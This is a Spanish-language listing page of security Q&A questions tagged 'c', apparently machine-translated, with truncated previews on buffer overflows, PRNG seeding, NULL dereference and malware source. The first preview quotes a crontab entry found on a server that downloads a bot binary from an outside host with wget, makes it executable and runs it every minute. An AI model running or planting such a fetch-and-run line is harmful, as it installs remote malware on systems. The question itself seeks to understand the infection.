Preguntas con etiqueta 'c'

preguntas con etiqueta
3
respuestas

¿Es SecureShellz bot un virus? ¿Como funciona?

Estoy usando un servidor de desarrollo en el que encontré esto en el crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/s...
hecha 06.07.2012 - 11:08
1
respuesta

¿Cómo predecir C rand ()? [duplicar]

¿Hay alguna forma práctica de predecir la salida de C rand () anterior / siguiente si tengo algunos de los valores? ¿Cuántos valores necesito? ¿Tienen que ser consecuentes? Si depende del compilador, ¿para qué implementaciones es posible y cóm...
hecha 27.02.2013 - 20:16
2
respuestas

implicaciones de seguridad de la desreferencia NULL

Supongamos que tenemos un código como este: struct somedata { int a; int b; }; struct somedata *data; /* ... */ data = malloc(sizeof(struct somedata)); data->a = something; Ahora, como puede ver, falta la comprobación del puntero N...
hecha 28.07.2011 - 19:00
1
respuesta

¿Cómo sembrar adecuadamente el PRNG en OpenSSL?

Estoy creando una aplicación que se ejecuta en un nodo móvil con Ubuntu, que no genera suficientes bytes de entropía para / dev / random, y no siempre permanece conectada a Internet para usar soluciones típicas de recolección de entropía de sock...
hecha 21.04.2011 - 23:42
2
respuestas

¿Es posible codificar bytes en una explotación de desbordamiento de búfer que desvía las funciones de cadena?

Descargo de responsabilidad : esta vulnerabilidad es únicamente para uso educativo. En este exploit, interpreto el papel de la víctima y el software explotado está escrito solo por mí. Tengo un servidor HTTP simple que quiero explotar con un...
hecha 25.07.2015 - 14:00
2
respuestas

¿Las condiciones de carrera basadas en memcpy () son explotables para causar la ejecución remota de código?

Supongamos que tengo el siguiente pseudocódigo en la parte de confianza de un recinto de seguridad que evita que los códigos no confiables llamen a mprotect() y mmap() y ptrace() directamente (no se puede acceder al mutext...
hecha 20.02.2017 - 02:44
0
respuestas

OpenSSL EVP aes_256_cbc Tamaño de vector de inicialización

Estoy viendo los ejemplos de bibliotecas criptográficas (programados en c) proporcionados para OpenSSL EVP en OpenSSL Wiki . Su ejemplo para un vector de inicialización de 128 bits es el siguiente:    / * A 128 bit IV * /    unsigned ch...
hecha 24.02.2017 - 01:20
2
respuestas

En C, no usar 'void' si una función no acepta ningún argumento es una vulnerabilidad potencial

En el estándar de codificación segura CERT, hay una recomendación de que " Siempre especifique void incluso si una función no acepta argumentos ". Se propone una posible vulnerabilidad de seguridad. /* Compile using gcc4.3.3 */ void foo() {...
hecha 27.09.2013 - 14:41
2
respuestas

¿Hay algún código fuente descompilado para el malware “Flame” / “Skywiper”?

Al buscar la fuente de Stuxnet, es relativamente fácil de encontrar de una forma u otra. Aunque en realidad tengo curiosidad por saber si alguien ha hecho algún trabajo para comentar la fuente y quizás limpiar la asignación de nombres de variabl...
hecha 05.02.2013 - 04:23
3
respuestas

¿Cómo llevar esto al desbordamiento de búfer?

Estoy tratando de entender el desbordamiento del búfer, y estoy trabajando con un simple código, como se muestra a continuación. #include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *str) { char buffer...
hecha 09.10.2012 - 08:08